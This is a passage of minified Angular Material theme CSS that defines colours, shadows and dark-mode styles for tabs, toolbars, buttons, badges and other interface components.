.mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#f44336}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-toolbar[_ngcontent-%COMP%]{background:whitesmoke;color:#000000de}.mat-toolbar.mat-primary[_ngcontent-%COMP%]{background:#2196f3;color:#fff}.mat-toolbar.mat-accent[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.mat-toolbar.mat-warn[_ngcontent-%COMP%]{background:#f44336;color:#fff}.mat-toolbar[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] .mat-focused[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:currentColor}.mat-toolbar[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] .mat-focused[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] .mat-select-value[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%], .mat-toolbar[_ngcontent-%COMP%] .mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:inherit}.mat-toolbar[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]{caret-color:currentColor}.mat-toolbar-multiple-rows[_ngcontent-%COMP%]{min-height:64px}.mat-toolbar-row[_ngcontent-%COMP%], .mat-toolbar-single-row[_ngcontent-%COMP%]{height:64px}@media (max-width: 599px){.mat-toolbar-multiple-rows[_ngcontent-%COMP%]{min-height:56px}.mat-toolbar-row[_ngcontent-%COMP%], .mat-toolbar-single-row[_ngcontent-%COMP%]{height:56px}}.mat-tooltip[_ngcontent-%COMP%]{background:rgba(97,97,97,.9)}.mat-tree[_ngcontent-%COMP%]{background:white}.mat-tree-node[_ngcontent-%COMP%], .mat-nested-tree-node[_ngcontent-%COMP%]{color:#000000de}.mat-tree-node[_ngcontent-%COMP%]{min-height:48px}.mat-snack-bar-container[_ngcontent-%COMP%]{color:#ffffffb3;background:#323232;box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-simple-snackbar-action[_ngcontent-%COMP%]{color:#7b1fa2}.color-primary[_ngcontent-%COMP%]{color:#2196f3}.background-color-primary[_ngcontent-%COMP%]{background-color:#2196f3}.background-color-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%] .mat-option[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-option[_ngcontent-%COMP%]:hover:not(.mat-option-disabled), .darkMode[_ngcontent-%COMP%] .mat-option[_ngcontent-%COMP%]:focus:not(.mat-option-disabled){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple):not(.mat-option-disabled){background:rgba(255,255,255,.04)}.darkMode[_ngcontent-%COMP%] .mat-option.mat-active[_ngcontent-%COMP%]{background:rgba(255,255,255,.04);color:#fff}.darkMode[_ngcontent-%COMP%] .mat-option.mat-option-disabled[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-primary[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-accent[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-warn[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-optgroup-label[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-optgroup-disabled[_ngcontent-%COMP%] .mat-optgroup-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-pseudo-checkbox[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-pseudo-checkbox[_ngcontent-%COMP%]:after{color:#303030}.darkMode[_ngcontent-%COMP%] .mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{color:#686868}.darkMode[_ngcontent-%COMP%] .mat-primary[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-primary[_ngcontent-%COMP%] .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-accent[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-accent[_ngcontent-%COMP%] .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-warn[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-warn[_ngcontent-%COMP%] .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#f44336}.darkMode[_ngcontent-%COMP%] .mat-pseudo-checkbox-checked.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-pseudo-checkbox-indeterminate.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{background:#686868}.darkMode[_ngcontent-%COMP%] .mat-app-background[_ngcontent-%COMP%], .darkMode.mat-app-background[_ngcontent-%COMP%]{background-color:#303030;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-elevation-z0[_ngcontent-%COMP%]{box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z1[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z2[_ngcontent-%COMP%]{box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z3[_ngcontent-%COMP%]{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z4[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z5[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 5px 8px #00000024,0 1px 14px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z6[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z7[_ngcontent-%COMP%]{box-shadow:0 4px 5px -2px #0003,0 7px 10px 1px #00000024,0 2px 16px 1px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z8[_ngcontent-%COMP%]{box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z9[_ngcontent-%COMP%]{box-shadow:0 5px 6px -3px #0003,0 9px 12px 1px #00000024,0 3px 16px 2px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z10[_ngcontent-%COMP%]{box-shadow:0 6px 6px -3px #0003,0 10px 14px 1px #00000024,0 4px 18px 3px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z11[_ngcontent-%COMP%]{box-shadow:0 6px 7px -4px #0003,0 11px 15px 1px #00000024,0 4px 20px 3px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z12[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z13[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 13px 19px 2px #00000024,0 5px 24px 4px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z14[_ngcontent-%COMP%]{box-shadow:0 7px 9px -4px #0003,0 14px 21px 2px #00000024,0 5px 26px 4px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z15[_ngcontent-%COMP%]{box-shadow:0 8px 9px -5px #0003,0 15px 22px 2px #00000024,0 6px 28px 5px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z16[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z17[_ngcontent-%COMP%]{box-shadow:0 8px 11px -5px #0003,0 17px 26px 2px #00000024,0 6px 32px 5px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z18[_ngcontent-%COMP%]{box-shadow:0 9px 11px -5px #0003,0 18px 28px 2px #00000024,0 7px 34px 6px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z19[_ngcontent-%COMP%]{box-shadow:0 9px 12px -6px #0003,0 19px 29px 2px #00000024,0 7px 36px 6px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z20[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 20px 31px 3px #00000024,0 8px 38px 7px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z21[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 21px 33px 3px #00000024,0 8px 40px 7px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z22[_ngcontent-%COMP%]{box-shadow:0 10px 14px -6px #0003,0 22px 35px 3px #00000024,0 8px 42px 7px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z23[_ngcontent-%COMP%]{box-shadow:0 11px 14px -7px #0003,0 23px 36px 3px #00000024,0 9px 44px 8px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-elevation-z24[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-theme-loaded-marker[_ngcontent-%COMP%]{display:none}.darkMode[_ngcontent-%COMP%] .mat-autocomplete-panel[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-autocomplete-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-autocomplete-panel[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover){background:#424242}.darkMode[_ngcontent-%COMP%] .mat-autocomplete-panel[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover):not(.mat-option-disabled){color:#fff}.darkMode[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#2196f3}.cdk-high-contrast-active[_ngcontent-%COMP%] .darkMode[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{outline:solid 1px;border-radius:0}.darkMode[_ngcontent-%COMP%] .mat-badge-accent[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-badge-warn[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#f44336}.darkMode[_ngcontent-%COMP%] .mat-badge-disabled[_ngcontent-%COMP%] .mat-badge-content[_ngcontent-%COMP%]{background:#6e6e6e;color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-bottom-sheet-container[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f;background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button[_ngcontent-%COMP%]{color:inherit;background:transparent}.darkMode[_ngcontent-%COMP%] .mat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-warn[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-button.mat-primary[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-primary[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-primary[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-button.mat-accent[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-accent[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-accent[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-button.mat-warn[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-warn[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-warn[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-button.mat-button-disabled[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button.mat-button-disabled[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button.mat-button-disabled[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:transparent}.darkMode[_ngcontent-%COMP%] .mat-button[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-icon-button[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-stroked-button[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{opacity:.1;background-color:currentColor}.darkMode[_ngcontent-%COMP%] .mat-button-focus-overlay[_ngcontent-%COMP%]{background:white}.darkMode[_ngcontent-%COMP%] .mat-stroked-button[_ngcontent-%COMP%]:not(.mat-button-disabled){border-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-flat-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab[_ngcontent-%COMP%]{color:#fff;background-color:#424242}.darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] 